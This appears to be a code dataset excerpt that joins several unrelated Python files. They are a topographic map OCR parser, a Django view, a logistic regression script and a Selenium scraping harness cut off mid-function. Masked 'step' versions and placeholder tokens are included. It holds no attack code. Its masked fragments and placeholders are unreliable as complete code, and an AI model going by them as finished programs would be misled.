os.remove(filename)\n word_list = words.split()\n box_list = boxes.split()\n return word_list, box_list\n\n @property\n def contour_interval_dist(self):\n return 40\n\n @contour_interval_dist.setter\n def contour_interval_dist(self, value):\n self._contour_interval_dist = value\n\n @property\n def feet_per_pixel(self):\n if self._feet_per_pixel is None:\n self._feet_per_pixel = self.__get_feet_per_pixel()\n return self._feet_per_pixel\n\n @feet_per_pixel.setter\n def feet_per_pixel(self, value):\n self._feet_per_pixel = value\n\n\nclass TopographicMap:\n\n def __init__(self, filename):\n self.filename = filename\n self.image = cv2.imread(filename, 1)[500:-550, 500:-500]\n self.image_data = ImageData(self.image)\n self.height, self.width, self.channels = self.image.shape\n\n\n<mask token>\n",
"step-5": "import cv2\nimport pytesseract\nimport os\nfrom PIL import Image\nimport numpy as np\n\nfrom helper_functions import Helper\n\nclass ImageData:\n\t# multipliers to get portion of image with interval value\n\t__bottom_thresh = 0.9\n\t__left_thresh = 0.35\n\t__right_thresh = 0.65\n\n\t# (words, offset) to contour interval value\n\t__words_offsets = [(\"CONTOUR\", 2), (\"INTERVAL\", 1), (\"FEET\", -1)]\n\t__resize_factor = 6\n\n\tdef __init__(self, image):\n\t\tself.image = image\n\n\t\t# self.sub_image = self.__get_sub_image()\n\t\t\n\t\t# word_list, box_list = self.__get_words()\n\t\t# self.word_list = word_list\n\t\t# self.box_list = box_list\n\n\t\tself._contour_interval_dist = None\n\t\tself._feet_per_pixel = None\n\n\tdef __get_sub_image(self):\n\t\trows, cols, chan = self.image.shape\n\n\t\tsub_image = self.image[\n\t\t\tint(self.__bottom_thresh*rows):rows, \t\t\t\t\t\t# bottom rows\n\t\t\tint(self.__left_thresh*cols):int(self.__right_thresh*cols)\t# middle rows\n\t\t\t]\n\n\t\tsub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy=self.__resize_factor, \n\t\t\tinterpolation = cv2.INTER_LINEAR)\n\n\t\tsub_image = Helper.convert_image_to_mask(sub_image)\n\t\tgray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, 7, 21)\n\t\tthreshold_image = cv2.threshold(gray_denoised_image,225,255,cv2.THRESH_BINARY_INV)[1]\n\n\t\treturn sub_image\n\n\tdef __get_countour_interval_dist(self):\n\t\tcandidates = []\n\n\t\tfor word, offset in self.__words_offsets:\n\t\t\tcandidates += self.__find_candidates_for_id_and_index(self.word_list, word, offset)\n\n\t\treturn candidates[0][1] if len(candidates) > 0 else 40 \n\n\tdef __get_feet_per_pixel(self):\n\t\t# row_size = 6\n\t\t# total = int(len(self.box_list) / 6)\n\t\t# idx = 0\n\n\t\t# nums = [(idx, int(char)) for idx, char in enumerate(self.box_list) \n\t\t# if idx % row_size == 0 and char.isdigit() and int(char) > 2 and int(char) < 10]\n\n\t\t# nums.sort(key=lambda val: self.box_list[val[0] + 2])\n\n\t\t# threshold = 3\n\t\t# prev_x = -1\n\t\t# prev_y = -2 * threshold\n\t\t# prev_num = -1\n\n\t\t# img = self.sub_image.copy()\n\n\t\t# lsd = cv2.createLineSegmentDetector(0)\n\t\t# lines = lsd.detect(img)[0] \n\t\t# drawn_img = lsd.drawSegments(img,lines)\n\t\t# cv2.imshow(\"LSD\",drawn_img )\n\t\t\n\t\t# # h, w, _ = img.shape\n\n\t\t# # for (idx, num) in nums:\n\t\t# # \tcur_x = int(self.box_list[idx + 1])\n\t\t# # \tcur_y = int(self.box_list[idx + 2])\n\t\t# # \tcur_x2 = int(self.box_list[idx + 3])\n\t\t# # \tcur_y2 = int(self.box_list[idx + 4])\n\n\t\t# # \tprint(str(num) + \": \" + str(cur_x) + \", \" + str(cur_y) + \" :: \" + str(cur_x2) + \", \" + str(cur_y2))\n\t\t# # \timg = cv2.rectangle(img,(cur_x,h-cur_y),(cur_x2,h-cur_y2),(255,0,0),2)\n\t\t# # \t# if abs(cur_y - prev_y) < threshold:\n\t\t# # \t# \tdist = abs(cur_x - cur_y)\n\t\t# # \t# \tdiff = abs(num - prev_num)\n\t\t# # \t# \tprint(\"possibility found ^\\n--------\")\n\n\t\t# # \t# prev_x = cur_x\n\t\t# # \t# prev_y = cur_y\n\t\t# # \t# prev_num = num\n\t\t# img = cv2.resize(img, None, fx=1/6, fy=1/6, \n\t\t# \tinterpolation = cv2.INTER_LINEAR)\n\t\t# cv2.imshow(\"blah\", img)\n\t\t# print(nums)\n\n\t\treturn 5280 / 790# hardcoded estimatem, ft per mile / pixel per mile = feet per pixel\n\n\tdef __find_candidates_for_id_and_index(self, word_list, id_word, offset):\n\t\tcandidates = []\n\n\t\tindices = [i for i, x in enumerate(word_list) if x.upper() == id_word]\n\n\t\tfor i in indices:\n\t\t\tif word_list[i+offset].isnumeric():\n\t\t\t\tcand = (i, int(word_list[i+offset]))\n\t\t\t\tcandidates.append(cand)\n\n\t\treturn candidates\n\n\tdef __get_words(self):\n\t\tfilename = \"{}.png\".format(os.getpid())\n\t\tcv2.imwrite(filename, self.sub_image)\n\n\t\twords = pytesseract.image_to_string(Image.open(filename))\n\n\t\tboxes = pytesseract.image_to_string(Image.open(filename), boxes=True, config=\"hocr\")\n\n\t\tos.remove(filename)\n\t\tword_list = words.split()\n\t\tbox_list = boxes.split()\n\n\t\treturn word_list, box_list\n\n\t@property\n\tdef contour_interval_dist(self):\n\t\t# if self._contour_interval_dist is None:\n\t\t# \tself._contour_interval_dist = self.__get_countour_interval_dist()\n\n\t\t# return self._contour_interval_dist\n\t\t# return 40\n\t\treturn 40\n\n\t@contour_interval_dist.setter\n\tdef contour_interval_dist(self, value):\n\t\tself._contour_interval_dist = value\n\n\t@property\n\tdef feet_per_pixel(self):\n\t\tif self._feet_per_pixel is None:\n\t\t\tself._feet_per_pixel = self.__get_feet_per_pixel()\n\n\t\treturn self._feet_per_pixel\n\n\t@feet_per_pixel.setter\n\tdef feet_per_pixel(self, value):\n\t\tself._feet_per_pixel = value\n\nclass TopographicMap:\n\tdef __init__(self, filename):\n\t\tself.filename = filename\n\t\tself.image = cv2.imread(filename, 1)[500:-550, 500:-500]\n\t\t# self.image = cv2.imread(filename, 1)#[500:-550, 500:-500]\n\t\tself.image_data = ImageData(self.image)\n\n\t\tself.height, self.width, self.channels = self.image.shape\n\t\t\n\nif __name__ == '__main__':\n\t# img = Topographic_Map(\"SanLuisObispo.jpg\")\n\timport numpy as np\n\timport time\n\timage = cv2.imread('maps/SanLuisObispo.jpg', 1)[500:1000, 500:1300]\n\tr, c, chan = image.shape\n\ttl = image[:int(r/2), :int(c/2)]\n\ttr = image[:int(r/2), int(c/2):]\n\tbl = image[int(r/2):, :int(c/2)]\n\tbr = image[int(r/2):, int(c/2):]\n\t\n\ts = time.time()\n\timg = cv2.fastNlMeansDenoising(image, None, 5, 7, 21)\n\te = time.time()\n\n\tprint(\"total image: \" + str(e-s))\n\n\ts = time.time()\n\ttl = cv2.fastNlMeansDenoising(tl, None, 5, 7, 21)\n\ttr = cv2.fastNlMeansDenoising(tr, None, 5, 7, 21)\n\tbl = cv2.fastNlMeansDenoising(bl, None, 5, 7, 21)\n\tbr = cv2.fastNlMeansDenoising(br, None, 5, 7, 21)\n\te = time.time()\n\n\ttop = np.concatenate((tl, tr), axis=1)\n\tbottom = np.concatenate((bl, br), axis=1)\n\tnew_image = np.concatenate((top, bottom), axis=0)\n\n\tprint(\"partitioned image: \" + str(e-s))\n\n\tcv2.imshow('img', img)\n\tcv2.imshow('new_image', new_image)\n\tcv2.waitKey(0)\n\tcv2.destroyAllWindows()\n",
"step-ids": [
6,
10,
11,
12,
17
]
}
|
[
6,
10,
11,
12,
17
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def index(request):
return render(request, 'munchiesfastfood/home.html', {'drinks': [
'Pineapple Juice', 'Green Juice', 'Soft Drinks',
'Carlo Rosee Drinks'], 'dishes': ['Beef Steak',
'Tomato with Chicken', 'Sausages from Italy', 'Beef Grilled']})
<|reserved_special_token_1|>
from django.shortcuts import render
def index(request):
return render(request, 'munchiesfastfood/home.html', {'drinks': [
'Pineapple Juice', 'Green Juice', 'Soft Drinks',
'Carlo Rosee Drinks'], 'dishes': ['Beef Steak',
'Tomato with Chicken', 'Sausages from Italy', 'Beef Grilled']})
|
flexible
|
{
"blob_id": "e279ca43ce2c582c702f1c6a0c1acf37eb9bcefe",
"index": 5603,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef index(request):\n return render(request, 'munchiesfastfood/home.html', {'drinks': [\n 'Pineapple Juice', 'Green Juice', 'Soft Drinks',\n 'Carlo Rosee Drinks'], 'dishes': ['Beef Steak',\n 'Tomato with Chicken', 'Sausages from Italy', 'Beef Grilled']})\n",
"step-3": "from django.shortcuts import render\n\n\ndef index(request):\n return render(request, 'munchiesfastfood/home.html', {'drinks': [\n 'Pineapple Juice', 'Green Juice', 'Soft Drinks',\n 'Carlo Rosee Drinks'], 'dishes': ['Beef Steak',\n 'Tomato with Chicken', 'Sausages from Italy', 'Beef Grilled']})\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import sys
import numpy as np
import math
import matplotlib.pyplot as plt
import random
def load_files(training, testing):
tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=",")
tr_feat /= 255.0
tr_feat = np.insert(tr_feat, 0, 0, axis=1)
tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=",")
tr_exp = tr_exp[:, -1]
te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=",")
te_feat /= 255.0
te_feat = np.insert(te_feat, 0, 0, axis=1)
te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=",")
te_exp = te_exp[:, -1]
# for i in tr_feat:
# if i > 1 or i < 0:
# raise ValueError("WHY")
# for i in te_feat:
# if i > 1 or i < 0:
# raise ValueError("WHY")
return tr_feat, tr_exp, te_feat, te_exp
def sigmoid(weight, case):
# try:
exponent = -np.dot(weight.T, case)
try:
prediction = 1.0 / (1.0 + math.exp(exponent))
except Exception as e:
return 1.0 / (1.0 + math.exp(500))
# If you've gotten this far you've noticed that the last two accuracies are always 50%
# I couldn't tell you why, seeing as our weights look correct
# And
return prediction
def check_accuracy(w, x, y):
correct = 0
for i in range(x.shape[0]):
if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:
correct += 1
elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:
correct += 1
percentage_correct = correct / x.shape[0]
return percentage_correct
def gradient(training_data, training_expected, testing_data, testing_expected, reg_strength=None, iterations=100, learning_rate=0.00005):
training_accuracies = []
testing_accuracies = []
if reg_strength is not None:
try:
reg_strength = float(reg_strength)
except:
reg_strength = None
w = np.zeros(training_data.shape[1]) # Feature count
for _ in range(iterations):
gradient_batch = np.zeros(training_data.shape[1]) # Feature count
for i in range(training_data.shape[0]): # Example count
predicted = sigmoid(w, training_data[i])
diff = (np.subtract(
predicted, training_expected[i]))
diff = np.multiply(diff, training_data[i])
gradient_batch = np.add(gradient_batch, diff)
if reg_strength is not None:
normalized = np.linalg.norm(w)
gradient_batch = np.add(
gradient_batch, np.multiply(normalized, reg_strength))
gradient_batch = np.multiply(learning_rate, gradient_batch)
w = np.subtract(w, gradient_batch)
training_accuracies.append(check_accuracy(
w, training_data, training_expected))
testing_accuracies.append(check_accuracy(
w, testing_data, testing_expected))
return training_accuracies, testing_accuracies
args = sys.argv[1:]
if len(args) < 2:
print("You must include a training and testing dataset, as well as a learning rate", file=sys.stderr)
print("Like so: python3 q2_1.py usps_train.csv usps_test.csv learning_rate")
exit(1)
iterations = []
for i in range(0, 100):
iterations.append(i+1)
training_features, training_expected, test_features, test_expected = load_files(
args[0], args[1])
training_accuracies, testing_accuracies = gradient(
training_features, training_expected, test_features, test_expected, learning_rate=float(args[2]))
plt.ylabel("Accuracy")
plt.xlabel("Iteration")
plt.title(f"Accuracy as Function of Iteration Learing Rate = {args[2]}")
plt.plot(iterations, training_accuracies, 'b', label='training')
plt.plot(iterations, testing_accuracies, 'r', label='testing')
plt.legend()
plt.show()
plt.savefig(f"graph_results.png")
|
normal
|
{
"blob_id": "4af05a13264c249be69071447101d684ff97063e",
"index": 6725,
"step-1": "<mask token>\n\n\ndef load_files(training, testing):\n tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=',')\n tr_feat /= 255.0\n tr_feat = np.insert(tr_feat, 0, 0, axis=1)\n tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=',')\n tr_exp = tr_exp[:, -1]\n te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=',')\n te_feat /= 255.0\n te_feat = np.insert(te_feat, 0, 0, axis=1)\n te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=',')\n te_exp = te_exp[:, -1]\n return tr_feat, tr_exp, te_feat, te_exp\n\n\ndef sigmoid(weight, case):\n exponent = -np.dot(weight.T, case)\n try:\n prediction = 1.0 / (1.0 + math.exp(exponent))\n except Exception as e:\n return 1.0 / (1.0 + math.exp(500))\n return prediction\n\n\ndef check_accuracy(w, x, y):\n correct = 0\n for i in range(x.shape[0]):\n if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:\n correct += 1\n elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:\n correct += 1\n percentage_correct = correct / x.shape[0]\n return percentage_correct\n\n\ndef gradient(training_data, training_expected, testing_data,\n testing_expected, reg_strength=None, iterations=100, learning_rate=5e-05):\n training_accuracies = []\n testing_accuracies = []\n if reg_strength is not None:\n try:\n reg_strength = float(reg_strength)\n except:\n reg_strength = None\n w = np.zeros(training_data.shape[1])\n for _ in range(iterations):\n gradient_batch = np.zeros(training_data.shape[1])\n for i in range(training_data.shape[0]):\n predicted = sigmoid(w, training_data[i])\n diff = np.subtract(predicted, training_expected[i])\n diff = np.multiply(diff, training_data[i])\n gradient_batch = np.add(gradient_batch, diff)\n if reg_strength is not None:\n normalized = np.linalg.norm(w)\n gradient_batch = np.add(gradient_batch, np.multiply(normalized,\n reg_strength))\n gradient_batch = np.multiply(learning_rate, gradient_batch)\n w = np.subtract(w, gradient_batch)\n training_accuracies.append(check_accuracy(w, training_data,\n training_expected))\n testing_accuracies.append(check_accuracy(w, testing_data,\n testing_expected))\n return training_accuracies, testing_accuracies\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_files(training, testing):\n tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=',')\n tr_feat /= 255.0\n tr_feat = np.insert(tr_feat, 0, 0, axis=1)\n tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=',')\n tr_exp = tr_exp[:, -1]\n te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=',')\n te_feat /= 255.0\n te_feat = np.insert(te_feat, 0, 0, axis=1)\n te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=',')\n te_exp = te_exp[:, -1]\n return tr_feat, tr_exp, te_feat, te_exp\n\n\ndef sigmoid(weight, case):\n exponent = -np.dot(weight.T, case)\n try:\n prediction = 1.0 / (1.0 + math.exp(exponent))\n except Exception as e:\n return 1.0 / (1.0 + math.exp(500))\n return prediction\n\n\ndef check_accuracy(w, x, y):\n correct = 0\n for i in range(x.shape[0]):\n if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:\n correct += 1\n elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:\n correct += 1\n percentage_correct = correct / x.shape[0]\n return percentage_correct\n\n\ndef gradient(training_data, training_expected, testing_data,\n testing_expected, reg_strength=None, iterations=100, learning_rate=5e-05):\n training_accuracies = []\n testing_accuracies = []\n if reg_strength is not None:\n try:\n reg_strength = float(reg_strength)\n except:\n reg_strength = None\n w = np.zeros(training_data.shape[1])\n for _ in range(iterations):\n gradient_batch = np.zeros(training_data.shape[1])\n for i in range(training_data.shape[0]):\n predicted = sigmoid(w, training_data[i])\n diff = np.subtract(predicted, training_expected[i])\n diff = np.multiply(diff, training_data[i])\n gradient_batch = np.add(gradient_batch, diff)\n if reg_strength is not None:\n normalized = np.linalg.norm(w)\n gradient_batch = np.add(gradient_batch, np.multiply(normalized,\n reg_strength))\n gradient_batch = np.multiply(learning_rate, gradient_batch)\n w = np.subtract(w, gradient_batch)\n training_accuracies.append(check_accuracy(w, training_data,\n training_expected))\n testing_accuracies.append(check_accuracy(w, testing_data,\n testing_expected))\n return training_accuracies, testing_accuracies\n\n\n<mask token>\nif len(args) < 2:\n print(\n 'You must include a training and testing dataset, as well as a learning rate'\n , file=sys.stderr)\n print('Like so: python3 q2_1.py usps_train.csv usps_test.csv learning_rate'\n )\n exit(1)\n<mask token>\nfor i in range(0, 100):\n iterations.append(i + 1)\n<mask token>\nplt.ylabel('Accuracy')\nplt.xlabel('Iteration')\nplt.title(f'Accuracy as Function of Iteration Learing Rate = {args[2]}')\nplt.plot(iterations, training_accuracies, 'b', label='training')\nplt.plot(iterations, testing_accuracies, 'r', label='testing')\nplt.legend()\nplt.show()\nplt.savefig(f'graph_results.png')\n",
"step-3": "<mask token>\n\n\ndef load_files(training, testing):\n tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=',')\n tr_feat /= 255.0\n tr_feat = np.insert(tr_feat, 0, 0, axis=1)\n tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=',')\n tr_exp = tr_exp[:, -1]\n te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=',')\n te_feat /= 255.0\n te_feat = np.insert(te_feat, 0, 0, axis=1)\n te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=',')\n te_exp = te_exp[:, -1]\n return tr_feat, tr_exp, te_feat, te_exp\n\n\ndef sigmoid(weight, case):\n exponent = -np.dot(weight.T, case)\n try:\n prediction = 1.0 / (1.0 + math.exp(exponent))\n except Exception as e:\n return 1.0 / (1.0 + math.exp(500))\n return prediction\n\n\ndef check_accuracy(w, x, y):\n correct = 0\n for i in range(x.shape[0]):\n if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:\n correct += 1\n elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:\n correct += 1\n percentage_correct = correct / x.shape[0]\n return percentage_correct\n\n\ndef gradient(training_data, training_expected, testing_data,\n testing_expected, reg_strength=None, iterations=100, learning_rate=5e-05):\n training_accuracies = []\n testing_accuracies = []\n if reg_strength is not None:\n try:\n reg_strength = float(reg_strength)\n except:\n reg_strength = None\n w = np.zeros(training_data.shape[1])\n for _ in range(iterations):\n gradient_batch = np.zeros(training_data.shape[1])\n for i in range(training_data.shape[0]):\n predicted = sigmoid(w, training_data[i])\n diff = np.subtract(predicted, training_expected[i])\n diff = np.multiply(diff, training_data[i])\n gradient_batch = np.add(gradient_batch, diff)\n if reg_strength is not None:\n normalized = np.linalg.norm(w)\n gradient_batch = np.add(gradient_batch, np.multiply(normalized,\n reg_strength))\n gradient_batch = np.multiply(learning_rate, gradient_batch)\n w = np.subtract(w, gradient_batch)\n training_accuracies.append(check_accuracy(w, training_data,\n training_expected))\n testing_accuracies.append(check_accuracy(w, testing_data,\n testing_expected))\n return training_accuracies, testing_accuracies\n\n\nargs = sys.argv[1:]\nif len(args) < 2:\n print(\n 'You must include a training and testing dataset, as well as a learning rate'\n , file=sys.stderr)\n print('Like so: python3 q2_1.py usps_train.csv usps_test.csv learning_rate'\n )\n exit(1)\niterations = []\nfor i in range(0, 100):\n iterations.append(i + 1)\ntraining_features, training_expected, test_features, test_expected = (\n load_files(args[0], args[1]))\ntraining_accuracies, testing_accuracies = gradient(training_features,\n training_expected, test_features, test_expected, learning_rate=float(\n args[2]))\nplt.ylabel('Accuracy')\nplt.xlabel('Iteration')\nplt.title(f'Accuracy as Function of Iteration Learing Rate = {args[2]}')\nplt.plot(iterations, training_accuracies, 'b', label='training')\nplt.plot(iterations, testing_accuracies, 'r', label='testing')\nplt.legend()\nplt.show()\nplt.savefig(f'graph_results.png')\n",
"step-4": "import sys\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport random\n\n\ndef load_files(training, testing):\n tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=',')\n tr_feat /= 255.0\n tr_feat = np.insert(tr_feat, 0, 0, axis=1)\n tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=',')\n tr_exp = tr_exp[:, -1]\n te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=',')\n te_feat /= 255.0\n te_feat = np.insert(te_feat, 0, 0, axis=1)\n te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=',')\n te_exp = te_exp[:, -1]\n return tr_feat, tr_exp, te_feat, te_exp\n\n\ndef sigmoid(weight, case):\n exponent = -np.dot(weight.T, case)\n try:\n prediction = 1.0 / (1.0 + math.exp(exponent))\n except Exception as e:\n return 1.0 / (1.0 + math.exp(500))\n return prediction\n\n\ndef check_accuracy(w, x, y):\n correct = 0\n for i in range(x.shape[0]):\n if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:\n correct += 1\n elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:\n correct += 1\n percentage_correct = correct / x.shape[0]\n return percentage_correct\n\n\ndef gradient(training_data, training_expected, testing_data,\n testing_expected, reg_strength=None, iterations=100, learning_rate=5e-05):\n training_accuracies = []\n testing_accuracies = []\n if reg_strength is not None:\n try:\n reg_strength = float(reg_strength)\n except:\n reg_strength = None\n w = np.zeros(training_data.shape[1])\n for _ in range(iterations):\n gradient_batch = np.zeros(training_data.shape[1])\n for i in range(training_data.shape[0]):\n predicted = sigmoid(w, training_data[i])\n diff = np.subtract(predicted, training_expected[i])\n diff = np.multiply(diff, training_data[i])\n gradient_batch = np.add(gradient_batch, diff)\n if reg_strength is not None:\n normalized = np.linalg.norm(w)\n gradient_batch = np.add(gradient_batch, np.multiply(normalized,\n reg_strength))\n gradient_batch = np.multiply(learning_rate, gradient_batch)\n w = np.subtract(w, gradient_batch)\n training_accuracies.append(check_accuracy(w, training_data,\n training_expected))\n testing_accuracies.append(check_accuracy(w, testing_data,\n testing_expected))\n return training_accuracies, testing_accuracies\n\n\nargs = sys.argv[1:]\nif len(args) < 2:\n print(\n 'You must include a training and testing dataset, as well as a learning rate'\n , file=sys.stderr)\n print('Like so: python3 q2_1.py usps_train.csv usps_test.csv learning_rate'\n )\n exit(1)\niterations = []\nfor i in range(0, 100):\n iterations.append(i + 1)\ntraining_features, training_expected, test_features, test_expected = (\n load_files(args[0], args[1]))\ntraining_accuracies, testing_accuracies = gradient(training_features,\n training_expected, test_features, test_expected, learning_rate=float(\n args[2]))\nplt.ylabel('Accuracy')\nplt.xlabel('Iteration')\nplt.title(f'Accuracy as Function of Iteration Learing Rate = {args[2]}')\nplt.plot(iterations, training_accuracies, 'b', label='training')\nplt.plot(iterations, testing_accuracies, 'r', label='testing')\nplt.legend()\nplt.show()\nplt.savefig(f'graph_results.png')\n",
"step-5": "import sys\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport random\n\n\ndef load_files(training, testing):\n tr_feat = np.genfromtxt(training, usecols=range(256), delimiter=\",\")\n tr_feat /= 255.0\n tr_feat = np.insert(tr_feat, 0, 0, axis=1)\n tr_exp = np.genfromtxt(training, usecols=range(-1), delimiter=\",\")\n tr_exp = tr_exp[:, -1]\n\n te_feat = np.genfromtxt(testing, usecols=range(256), delimiter=\",\")\n te_feat /= 255.0\n te_feat = np.insert(te_feat, 0, 0, axis=1)\n te_exp = np.genfromtxt(testing, usecols=range(-1), delimiter=\",\")\n te_exp = te_exp[:, -1]\n\n # for i in tr_feat:\n # if i > 1 or i < 0:\n # raise ValueError(\"WHY\")\n # for i in te_feat:\n # if i > 1 or i < 0:\n # raise ValueError(\"WHY\")\n\n return tr_feat, tr_exp, te_feat, te_exp\n\n\ndef sigmoid(weight, case):\n # try:\n exponent = -np.dot(weight.T, case)\n\n try:\n prediction = 1.0 / (1.0 + math.exp(exponent))\n except Exception as e:\n return 1.0 / (1.0 + math.exp(500))\n # If you've gotten this far you've noticed that the last two accuracies are always 50%\n # I couldn't tell you why, seeing as our weights look correct\n # And\n\n return prediction\n\n\ndef check_accuracy(w, x, y):\n correct = 0\n\n for i in range(x.shape[0]):\n if np.dot(w.T, x[i]) >= 0.0 and y[i] == 1:\n correct += 1\n elif np.dot(w.T, x[i]) < 0.0 and y[i] == 0:\n correct += 1\n\n percentage_correct = correct / x.shape[0]\n return percentage_correct\n\n\ndef gradient(training_data, training_expected, testing_data, testing_expected, reg_strength=None, iterations=100, learning_rate=0.00005):\n training_accuracies = []\n testing_accuracies = []\n\n if reg_strength is not None:\n try:\n reg_strength = float(reg_strength)\n except:\n reg_strength = None\n\n w = np.zeros(training_data.shape[1]) # Feature count\n\n for _ in range(iterations):\n gradient_batch = np.zeros(training_data.shape[1]) # Feature count\n for i in range(training_data.shape[0]): # Example count\n predicted = sigmoid(w, training_data[i])\n diff = (np.subtract(\n predicted, training_expected[i]))\n diff = np.multiply(diff, training_data[i])\n gradient_batch = np.add(gradient_batch, diff)\n\n if reg_strength is not None:\n normalized = np.linalg.norm(w)\n gradient_batch = np.add(\n gradient_batch, np.multiply(normalized, reg_strength))\n\n gradient_batch = np.multiply(learning_rate, gradient_batch)\n w = np.subtract(w, gradient_batch)\n\n training_accuracies.append(check_accuracy(\n w, training_data, training_expected))\n testing_accuracies.append(check_accuracy(\n w, testing_data, testing_expected))\n\n return training_accuracies, testing_accuracies\n\n\nargs = sys.argv[1:]\nif len(args) < 2:\n print(\"You must include a training and testing dataset, as well as a learning rate\", file=sys.stderr)\n print(\"Like so: python3 q2_1.py usps_train.csv usps_test.csv learning_rate\")\n exit(1)\n\niterations = []\nfor i in range(0, 100):\n iterations.append(i+1)\n\ntraining_features, training_expected, test_features, test_expected = load_files(\n args[0], args[1])\ntraining_accuracies, testing_accuracies = gradient(\n training_features, training_expected, test_features, test_expected, learning_rate=float(args[2]))\nplt.ylabel(\"Accuracy\")\nplt.xlabel(\"Iteration\")\nplt.title(f\"Accuracy as Function of Iteration Learing Rate = {args[2]}\")\nplt.plot(iterations, training_accuracies, 'b', label='training')\nplt.plot(iterations, testing_accuracies, 'r', label='testing')\nplt.legend()\nplt.show()\nplt.savefig(f\"graph_results.png\")\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# -*- coding: utf-8 -*-
"""
Description: This modules is used for testing. Testing is performed based on the list of commands given to perform in a website
Version : v1.5
History :
v1.0 - 08/01/2016 - Initial version
v1.1 - 08/05/2016 - Modified to accept List input.
v1.2 - 08/05/2016 - Removed dead code in feed_input
v1.3 - 08/05/2016 - Added function get_data_dictionary to return the fetched values
v1.4 - 09/01/2016 - updated _print_ function and added log_process_status variable
v1.5 - 09/22/2016 - variable to suppress output running. Default - output will be written to file.
Open Issues: None.
Pending : Enhance coding standards. Clean up dead code in feed_input function
"""
__version__ = "1.0.0"
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
from URL_Status import *
import time # for sleep
import requests #to check status of the page
from Utilities import *
class PatternScraping():
def __init__(self,output_filename=None,developer_mode=False,print_instance=None,browser_instance=None,log_process_status=True,write_output=True):
self.developer_mode = developer_mode
self.log_process_status=log_process_status
if output_filename:
self.output_filename=output_filename
else:
self.output_filename='PatternScraping.' + get_timestamp_for_file() + '.testing.txt'
self.write_output=write_output
self.possible_commands = ['GO', 'GET_VALUE', 'CLICK', 'ENTER_VALUE','EXIT', 'SLEEP', 'GET_VALUES','GET_LINKS']
self.possible_command_types = ['ID', 'XPATH', 'NAME', 'CLASS', 'CSS']
self.browser = None
self.ins_browser=browser_instance
self.initiate_print_instance(instance_instance=print_instance)
def _print_(self,input_string_in,skip_timestamp=False,add_leading_space=True,message_priority=''):
module_name='PatternScraping'
input_string=input_string_in
if isinstance(input_string,str):
input_string = get_html_to_unicode_string(input_string)
if self.print_instance:
self.print_instance.customPrint(input_string,skip_timestamp=skip_timestamp,add_leading_space=add_leading_space,module_name=module_name,message_priority=message_priority)
else:
print_string=u'' + module_name + '\t' + message_priority + '\t' + input_string
if not skip_timestamp:
print_string = log_time_stamp() + print_string
print get_printable_string(print_string)
def initiate_print_instance(self,instance_instance=None):
self.print_instance=None
if instance_instance:
try:
if instance_instance.check():
self.print_instance=instance_instance
return True
except:
return False
return False
def validate_input_commands(self,list_of_commands):#commands have tupple
print_prefix='validate_input_commands\t'
for i in range(len(list_of_commands)):
if self.developer_mode:
self._print_(print_prefix + 'Current Input:' + str(list_of_commands[i]))
if list_of_commands[i][0] not in self.possible_commands:
self._print_(print_prefix + 'Command not in list:' + str(list_of_commands[i][0]))
custom_exit()
line_no = str(i + 1)
list_length = len(list_of_commands[i])
command_name=list_of_commands[i][0]
if command_name not in ['GO','SLEEP','EXIT'] and list_of_commands[i][1] not in self.possible_command_types:
status="Unknown command type"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'GO':
if not list_of_commands[i][1]:
status = "no link provided" + " in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'GET_VALUE':
if list_length != 4 or any(list_of_commands[i]) is False:
status = "no data provided"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'GET_VALUES':
if list_length != 4 or any(list_of_commands[i]) is False:
status = "no link provided"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'CLICK':
if list_length != 3 and list_length != 5:
status = "click command length error "+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if any(list_of_commands[i]) is False:
status = "click syntax error"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'ENTER_VALUE':
if not (list_length == 4 and list_of_commands[i][2]
and list_of_commands[i][3]):
status = "ENTER VALUE syntax error"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'SLEEP':
